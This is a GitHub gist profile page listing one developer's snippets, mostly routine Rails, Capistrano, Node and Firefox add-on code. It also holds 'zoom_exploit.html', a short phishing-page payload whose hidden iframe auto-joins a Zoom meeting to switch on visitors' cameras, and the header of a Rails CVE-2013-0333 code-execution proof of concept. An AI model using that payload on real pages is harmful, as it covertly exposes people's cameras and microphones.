Skip to content

Instantly share code, notes, and snippets.

View JangoSteve's full-sized avatar

Steve Schwartz JangoSteve

View GitHub Profile
View zoom_exploit.html
<body>
<h1>Totally not a phishing site to enable your camera and possibly microphone</h1>
<script>
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "https://zoom.us/j/492468757";
document.body.appendChild(iframe);
setTimeout( function() {
iframe.parentNode.removeChild(iframe);
@JangoSteve
JangoSteve / uninstall_extension.js
Last active August 29, 2015 14:02
Programmatically uninstall an old version of an extension with a different UUID (i.e. loading new version with changed UUID would install side-by-side)
View uninstall_extension.js
const {Cu} = require("chrome");
Cu.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAllAddons(function(aAddons) {
// Here aAddons is an array of Addon objects
var len = aAddons.length;
console.log("Addons!");
for (var i = 0; i < len; i++) {
var addon = aAddons[i];
console.log(addon.id, addon.name, addon.version, addon.isActive, addon.userDisabled);
@JangoSteve
JangoSteve / abstract.js
Created May 17, 2013 17:41
Websocket Presentation Abstract
View abstract.js
// Steve (server)
var WebSocketServer = require('ws').Server
, wss = new WebSocketServer({port: 8080});
wss.on('connection', function(ws) {
ws.on('message', function(message) {
ws.send("Sure thing, how's this?");
});
});
// Brian (browser)
@JangoSteve
JangoSteve / rails_omakase.rb
Last active December 12, 2015 01:58 — forked from postmodern/rails_omakase.rb
Works with Rails 2.2.x on Ruby 1.8.7. Really harmless, but if you see a `#<ActionController>` object in your params, that's bad.
View rails_omakase.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
#
# ## Advisory
#
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
#
# ## Caveats
#
@JangoSteve
JangoSteve / setup_load_paths.rb
Created August 23, 2012 02:03
Passenger RVM script in config
View setup_load_paths.rb
if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
begin
rvm_path = File.dirname(File.dirname(ENV['MY_RUBY_HOME']))
if ENV['RAILS_ENV'] == 'production'
rvm_lib_path = "/usr/local/rvm/lib"
else
rvm_lib_path = File.join(rvm_path, 'lib')
end
$LOAD_PATH.unshift rvm_lib_path
require 'rvm'
@JangoSteve
JangoSteve / controller.js
Created July 23, 2012 23:42
Example ExpressJS view with partials
View controller.js
app.get('/', function(req, res) {
// [clipped] set user
res.render('index', {user: user});
});
@JangoSteve
JangoSteve / gist:2294823
Created April 3, 2012 19:13 — forked from bruno-/gist:2294117
Capistrano mysql interactive installation
View gist:2294823
desc "Install the latest stable release of MySql."
task :install, roles: :db, only: {primary: true} do
#run "echo #{mysql_password}"
run "#{sudo} apt-get -y update"
run "#{sudo} apt-get -y install mysql-server" do |channel, stream, data|
# prompts for mysql root password (when blue screen appears)
channel.send_data("#{mysql_root_password}\n\r") if data =~ /password/
end
run "#{sudo} apt-get -y install mysql-client libmysqlclient-dev"
end
@JangoSteve
JangoSteve / mysql_install.rb
Created March 31, 2012 18:21
Install mysql with capistrano on Ubuntu server
View mysql_install.rb
namespace :slicehost do
# The following will install mysql with default user/pw.
# Be sure to setup proper user/pw via mysql.
desc "Install MySQL"
task :install_mysql, :roles => :app do
apt_quiet_install('mysql-server libmysql-ruby')
#sudo "apt-get install mysql-server libmysql-ruby -y"
end
@JangoSteve
JangoSteve / redmine_trunk_on_heroku.md
Created March 1, 2012 21:39
Importing Redmine to Git, Deploying to Heroku
View redmine_trunk_on_heroku.md
@JangoSteve
JangoSteve / session_secret.rb
Created March 1, 2012 21:13
Generate session secret
View session_secret.rb
require 'active_support/secure_random'
random_string = ActiveSupport::SecureRandom.hex(30)
puts random_string